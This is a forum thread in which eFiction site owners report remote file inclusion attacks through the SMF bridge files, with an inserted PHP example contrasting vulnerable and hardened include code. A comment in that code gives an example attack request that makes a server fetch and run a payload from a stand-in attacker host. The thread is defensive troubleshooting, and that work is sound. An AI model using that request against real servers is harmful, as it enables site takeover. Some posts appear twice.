I've been dealing with some jerk attempting to exploit this all afternoon, though I didn't know exactly what they were trying to do until I found this report. I've deleted the SMF bridge files, since I wasn't actually using them, but is there anything else we should be doing? I have a bunch of stuff from my logs if you need it.
Sorry if this is the wrong place, btw. I can't exactly include any details here, either, so sorry about not following the template...
Thank you for reporting this. In the meantime I will advise everyone using the currently included bridge to disable/remove it.
I've also had someone try and exploit that today.
I don't know if this is related at all, since I have not bridged my eFic to SMF, although I was intending to, just haven't got around to it yet.
Yesterday my SMF was hacked and index page stolen. I have reported to the SMF team, so perhaps the vulnerability might be with them. I am running SMF 1.1.1 and will be updating to 1.1.2 probably tonight, as that is supposed to have some security patches.
If I get any info back from them on how it was done, I can pass it along if it can help.
why is nothing ever easy?
url: http://www.pretendercentre.com/missingpieces/
php: 5.2.5 mysql: 5.0.45-community
efic version: 3.4.3 latest patches: yes
bridges: none mods: challenges, displayword, beta-search
It is definitely an eFiction problem, not an SMF problem. I've just had a look at the code in question, and I believe in order for an exploit to be successful:
- You must have register_globals turned on in your php.ini.
- Unless the hacker has some other means of uploading php source code to a file on your server, you must also have allow_url_include turned on in your php.ini
For a secure installation of PHP neither one of these should be turned on. register_globals was defaulted to on in older installations of PHP. allow_url_include has always had the default value of Off.
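The two php.ini conditions in the post above describe a classic remote file inclusion setup: a variable that the script never initialises gets populated from the query string by register_globals, and allow_url_include lets the include() fetch the attacker's file over HTTP. The following is an added illustration written for this thread, not eFiction's actual bridge code and not the code the poster reviewed; the function names, the `$bridge_dir` variable, the `bridges/` file names and the `bridge` parameter are all hypothetical. It puts the vulnerable shape beside a hardened one and ends with the configuration check you would run on your own host.

```php
<?php
// Added example for this thread, not eFiction's bridge code.
// Hypothetical names throughout: $bridge_dir, load_bridge_*, bridges/smf.php.

// --- Vulnerable shape -------------------------------------------------------
// $bridge_dir is never assigned anywhere in the application. With
// register_globals=On a request such as
//     ?bridge_dir=http://attacker.example/payload.txt%3F
// creates it from the query string; with allow_url_include=On the include()
// then downloads and executes the remote file. With allow_url_include=Off the
// same request still includes any local file the attacker has managed to
// upload (the "other means" mentioned above).
function load_bridge_vulnerable()
{
    global $bridge_dir;                    // populated only by register_globals
    include $bridge_dir . '/bridge.php';   // attacker controls the whole path
}

// --- Hardened shape ---------------------------------------------------------
// 1. The request supplies a *name*, never a path or URL.
// 2. The name is mapped through a fixed allow-list to a file we ship.
// 3. The resolved path must stay inside the bridges/ directory.
function load_bridge_hardened($requested)
{
    $allowed = array(                      // hypothetical bridge files
        'smf'   => 'smf.php',
        'phpbb' => 'phpbb.php',
    );
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return false;                      // unknown bridge: do nothing
    }

    $base = realpath(__DIR__ . '/bridges');
    $path = realpath($base . '/' . $allowed[$requested]);

    // realpath() is false if the file is missing; the prefix test rejects
    // anything that resolved outside bridges/ (for example via a symlink).
    if ($base === false || $path === false) {
        return false;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;
    }

    include $path;
    return true;
}

// --- Configuration check ----------------------------------------------------
// Both directives should be off. On PHP 5.4 and later register_globals no
// longer exists, so ini_get() returns false, which counts as off.
function risky_ini_directives()
{
    $risky = array();
    foreach (array('register_globals', 'allow_url_include') as $directive) {
        $value = ini_get($directive);
        if (filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $risky[] = $directive;
        }
    }
    return $risky;
}

$requested = isset($_GET['bridge']) ? $_GET['bridge'] : 'none';
load_bridge_hardened($requested);

foreach (risky_ini_directives() as $directive) {
    echo "WARNING: $directive is On; set it to Off in php.ini\n";
}
```

Run the script from the command line (`php example.php`) on the affected host to see the configuration warnings; if register_globals or allow_url_include is reported On, the fix belongs in php.ini (or the host's per-directory override) rather than in the application. Removing the unused `bridges/` files, as several posters did, closes the specific entry point; the configuration check is what removes the class of problem.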
Turns out the hosting company that we're with caught this (at dracoandginny.com) and took some action to stop it. If you'd like me to forward the email along, I can do so, in case it would be of any help.
If you could please PM that info to Tammy, that would be most helpful.
It looks like my hack had something to do with this as well; my host got back to me with log traces, and all of the exploits were based on the bridges/ folder. I deleted mine from both my eFic installs, and my host help desk pointed me to this: http://secunia.com/advisories/24268/
Whoever hacked into my eFic also got into my email, and while I've managed to restore my eFic installs, I have yet to get access back to my email. I hope the self-claimed "Moroccan Islamic Team" or something doesn't further hack into my life.
Best of luck to anyone also dealing with this...
Archive: Dragonfayth
eFiction: 3.5.5/6
Latest Patch(es): Yes
bridged?: No
modified?: Yes
PHP: 7.4.25
MySQL: 5.7.32-35-log
Someone was nice enough to hack the main page on one of the new sites I'm building. Luckily it was only a redirect to the eFiction site.
I've deleted all the bridges from that directory. Is there anything else we can do to ensure security?
Turns out the hosting company that we're with caught this (at dracoandginny.com) and took some action to stop it. If you'd like me to forward the email along, I can do so, in case it would be of any help.
If you could please PM that info to Tammy, that would be most helpful.
Okay, I'll do that.